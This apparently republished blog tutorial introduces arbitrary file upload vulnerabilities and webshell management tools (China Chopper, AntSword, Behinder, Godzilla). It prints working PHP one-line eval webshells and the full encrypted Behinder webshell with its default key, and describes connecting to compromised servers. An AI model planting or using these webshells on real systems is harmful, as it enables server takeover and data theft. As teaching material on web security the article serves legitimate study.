Arbitrary file upload vulnerability (introduction)

Enterprise 2023-10-01 00:38:02 views: null

Arbitrary file upload vulnerability

Preface

Times are developing, and technology is also developing. In today's network environment, we are dealing with data all the time. We use communication tools such as WeChat and QQ, or use Taobao and JD.com for online shopping. They are all data interactions. In These data interactions are filled with a variety of malicious behaviors and threats. To protect the data of individuals and institutions, cybersecurity has become critical. Today we will discuss the principle of the arbitrary file upload vulnerability and the harm it brings.

What is file upload

File upload is the process of uploading files from a local computer or other device to a network server or other storage location. File upload allows you to transfer files (such as images, documents, audio or video, etc.) to different locations on the network for purposes such as file sharing, backup, storage, or sharing content with others.

File upload typically involves the following steps:

  1. User selects files to upload: Users select files to upload on their device, possibly through file explorer, dragging and dropping files, or selecting a file dialog box.
  2. Files are transferred to the server: Once the user selects a file, the file is sent over the network to a specific server. File transfer can be achieved using various protocols such as HTTP, FTP, SFTP, etc.
  3. File storage and processing: Once a file arrives at the server, it can be stored in the server's local file system or other storage devices. Depending on the application's needs, the server can process, convert, validate, or otherwise operate on the file.
  4. Responses and results: The server may return an upload-success response to inform the user that the file was successfully uploaded, or it may return an error response to indicate that a problem occurred during the upload.

Simply put, file uploading is a copy-paste behavior, but its execution environment has changed from our local computer to the vast computer network. If a hacker uses the file upload function to upload a piece of malicious code to a certain server , the consequences will also be very serious.

The dangers of file upload vulnerabilities

Now that we know what file uploading is, let’s talk about what harm it can cause.

We just talked about that if hackers and other criminals use file uploads to upload malicious code, the consequences will be very serious, so why is it said to be serious? Just imagine, if a thief secretly gets a key to your house without your knowledge, and he breaks into your house, what do you think he will do? Stealing money from your home, or making a mess of your home, or worse, lurking in your home and peeking into your life every day. It’s scary to think about it, but in the online world, what will hackers do if they master the file upload vulnerability? Let’s take a look.

When hackers or criminals use file upload vulnerabilities to upload malicious code, they may cause the following serious harm:

  1. The server is compromised: Hackers can upload files containing malicious code, such as WebShell, to gain control of the server. Once hackers gain access to a server, they can view, modify, or delete sensitive data, manipulate system settings, and even infect other users or servers.

  2. Data leakage: Through the upload of malicious files, hackers can access and steal sensitive data from the server. This may include the user's personal information, login credentials, payment information, etc. This data may be used to commit identity theft, fraud, or other malicious activities.

  3. System damage: Malicious code uploaded by hackers may cause system crashes, stop services, or damage system files. This can lead to business disruption, data loss, and severe impact on an organization's operations and reputation.

  4. Malware propagation: Hackers may upload files with malware or viruses. Once other users download or open these files, the malware will be infected on the user's device and spread to other network nodes. This can lead to a more widespread infection and more damage to the system.

  5. User privacy leakage: Hackers uploaded and accessed users' personal files or photos, which may lead to user privacy leakage. This has serious implications for an individual's reputation and privacy, and may lead to further malicious behavior such as social engineering attacks.

To sum up, when file upload vulnerabilities are exploited by hackers or criminals, it may lead to serious consequences such as system intrusion, sensitive data leakage, service interruption, malware spread, and user privacy leakage. Therefore, early identification and remediation of file upload vulnerabilities, and taking appropriate security measures to protect against such threats, are critical to protecting the security of networks and systems.

webshell

Among the file upload vulnerabilities, the most important one is webshell, which is the core of file upload. Hackers work hard to upload webshell. So what is webshell? Let’s break this word down. The first word is the Web, and the second word is the shell. In the previous Linux article, I have introduced the shell in detail. The shell is a method used for interaction between the user and the kernel. program. When they are connected, webshell is a program for users to interact with the web kernel. In other words, we can use webshell to execute all the command operations we want to execute.

<?php @eval($_POST['pass']);

This is the simplest webshell. We call it a one-sentence Trojan because it only uses one line of code to obtain the permissions of your web server. By replacing the pass in $_POST, we can obtain the permissions of your web server on the attacked server. Execute all the commands we want to execute in it. Of course, there are many more responsible webshells, which can achieve more powerful functions.

China Chopper

The author of Chopper is a veteran who grew up in a poor rural area. It is said that he has not finished junior high school and his English is not very good, but he has taught himself C++/J2ME/PHP/JSP/ASP.NET, etc. He speaks more than a dozen computer languages. When Taiwan was fighting for independence six or seven years ago, he left a black page saying "There is only one China" on the websites of the Kuomintang and the Democratic Progressive Party, and became famous in one fell swoop.

Kitchen Knife is a well-known WebShell whose name comes from the Chinese kitchen knife, a household kitchen tool. Chinese Chopper Shell is a powerful and commonly used WebShell tool that is often used by hackers and attackers to invade and control target servers.

Chinese Kitchen Knife Shell has the following features:

  1. Simple and easy to use: Chinese Chopper Shell has an intuitive user interface and easy-to-operate features, making it easy for attackers to use. It provides functions such as command execution, file management, and system information viewing.

  2. Concealment: Chinese Chopper Shell can use various technical means to hide and disguise, and can modify file access permissions to evade server detection and review.

  3. Remote control: Once the Chinese Chopper Shell is uploaded and activated on the target server, the attacker can remotely interact with and control the target server through it. Attackers can execute system commands, view and operate files, export databases, and other operations.

image-20230822101924529

The use of Chopper is also very simple. As long as we upload the webshell file to the specified server, we can connect and obtain permissions based on the webshell URL.

image-20230822102204442

This picture shows a kitchen knife that has obtained the corresponding permissions.

image-20230822102723379

By right-clicking the mouse, we can perform more operations, such as database management, virtual terminal, etc.

image-20230822102855633

We can link by right-clicking the mouse in the blank space and adding the URL of the compromised server webshell.

image-20230822103306820

Here I use a simple php one sentence Trojan to explain

<?php @eval($_POST['cmd']);?>

URL address: This is the address after our webshell is uploaded. The specific instructions will be introduced in detail in the future shooting range.

wehshell password: It is the value of the post request in the one-sentence Trojan. This value is also modified later to achieve intrusion control.

Script type: php is suitable for apache server, asp|aspx uses IIS server, and jsp is suitable for websites written by JAVA (in the chopper, the script type will be automatically matched)

Coding type: GB2312 is the national standard encoding, which affects the text encoding for display input.

AntSword

AntSword is an open source cross-platform WebShell management tool. It was developed by the domestic security team Knownsec to help security researchers, penetration testers, and system administrators manage and utilize WebShell more conveniently.

Ant Sword has the following characteristics:

  1. User-friendly: Antjian provides a friendly graphical user interface that enables users to manage and operate WebShell through intuitive operations without cumbersome command line operations.

  2. Powerful functions: Ant Sword provides a rich set of functions, such as file management, command execution, database operations, system information viewing, etc. Users can remotely execute commands, upload and download files, access databases, and perform various other operations through Ant Sword.

  3. Cross-platform support: Antjian is a cross-platform tool that can run on Windows, Linux, macOS and other operating systems, making it convenient for users to use and manage WebShell in different environments.

  4. Security: Ant Sword pays attention to security and provides many defensive measures and permission control functions to prevent the tool from being abused or used by unauthorized visitors.

image-20230822105400603

The use of the ant sword is also very simple. It has many similarities with the kitchen knife, but it is more powerful than the kitchen knife.

image-20230822110047571

Compared with the kitchen knife configuration, it is more concise.

image-20230822110325152

The interface after successful connection is also more intuitive.

image-20230822110413811

Ant Sword is a very powerful webshell. Further instructions on how to use Ant Sword will be provided in future updates.

Behinder

Ice Scorpion is a new Webshell client developed based on Java that dynamically encrypts communication traffic. The attack traffic characteristics of the Chinese Chopper, a long-established webshell management tool, are obvious and are easily detected by various security devices. It is increasingly used less and less in actual scenarios, and encrypted webshells are becoming increasingly popular.

Because communication traffic is encrypted, traditional WAF and IDS devices are difficult to detect, which brings great challenges to threat hunting. The biggest feature of Ice Scorpion is that it symmetrically encrypts interactive traffic, and the encryption key is dynamically generated by a random number function, so the client's traffic is almost impossible to detect.

image-20230822134653137

Ice Scorpion has its own dedicated webshell Trojan file.

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
    
    
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    
    
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
    
    
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{
    
    public function __invoke($p) {
    
    eval($p."");}}
    @call_user_func(new C(),$params);
?>

image-20230822135056502

Use the webshell that comes with Ice Scorpion to connect to the website and do bad things.

image-20230822135146372

After entering, you can see that the function of Ice Scorpion is very powerful.

Ice Scorpion Features:

  • As a commercial tool, Ice Scorpion provides a rich set of functions and tools, such as port forwarding, proxy services, lateral penetration, etc.
  • Ice Scorpion provides an intuitive graphical interface and user-friendly operation, making it easier for users to use and control.
  • Ice Scorpion's encryption principle: "Ice Scorpion" uses the AES encryption algorithm when the server supports open_ssl. The key length is 16 bits, which can also be called AES-16. This can quickly encrypt and decrypt both software and hardware (the AES instruction set of Intel processors contains six instructions), has low memory requirements, and is very suitable for traffic encryption.
    Three major features:
    traffic encryption, difficult to detect,
    webshell has good immunity from killing,
    encryption method: AES encryption
Godzilla

Godzilla WebShell is a WebShell tool named after the giant monster in the Japanese movie Godzilla. The Godzilla WebShell tool allows attackers to perform various operations on the target server, such as executing commands, viewing and modifying files, manipulating databases, etc.

Godzilla needs to run normally in a Java 1.8 environment. When the Godzilla software is opened, a data.db database will be generated to store data. Godzilla supports automatic generation of webshell files and supports jsp, php, asp, and aspx. Wait for the attack load. Compared with Ice Scorpion, Godzilla is more professional to use. If you want to use Godzilla well, you need to learn some special commands.

image-20230822140202219

Godzilla's initial interface.

image-20230822140237657

Use Management->Generate to generate a webshell.

image-20230822140533496

Configuring the connection is not as convenient as other webshell tools. You need to define the relevant configuration content yourself, otherwise it is easy to fail to connect.

image-20230822140635150

After the connection is successful, basic information will be returned.

image-20230822140729910

Here we can also configure various related plug-ins

Summarize

  • The file upload vulnerability is a common web security vulnerability that allows an attacker to upload malicious files on the target server to execute arbitrary code or gain system privileges.

  • WebShell is a hacking tool used to illegally invade and remotely control target servers. Common WebShell tools include Chinese Kitchen Knife Shell, Ant Sword, Ant Sword, etc.

Here we already know what file upload is, the dangers of file upload, what webshell is and some common tools of webshell. This is just an appetizer for file upload vulnerabilities. In future studies, I will gradually cover various types of Sharing the use of tools, methods of file upload vulnerabilities, and methods of preventing the vulnerabilities.

Guess you like

Origin blog.csdn.net/weixin_44369049/article/details/132437209
Recommended
Rushing to the GitHub hot list——How can open source programming languages and frameworks be so cute?
Beijing Humanoid Robot Innovation Center launches Tiangong, the world's first full-size humanoid robot with purely electric drive for anthropomorphic running
Ranking
8个无需编写代码即可使用 Python 内置库的方法
Java collections interview knowledge Lite
Machine learning algorithms foundation - Introduction a (watermelon materials for the book)
(Easy) Ransom Note - LeetCode
[Five days] Qt from entry to actual combat: the second day
Remember once extremely pit father can not download Maven Jar package of issues: IDEA question
The minimum cost Shortest
OSPF study map (the most complete version)
Network Takeaways
GnuPG
Daily
More
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

Code World

© 2018 codetd.com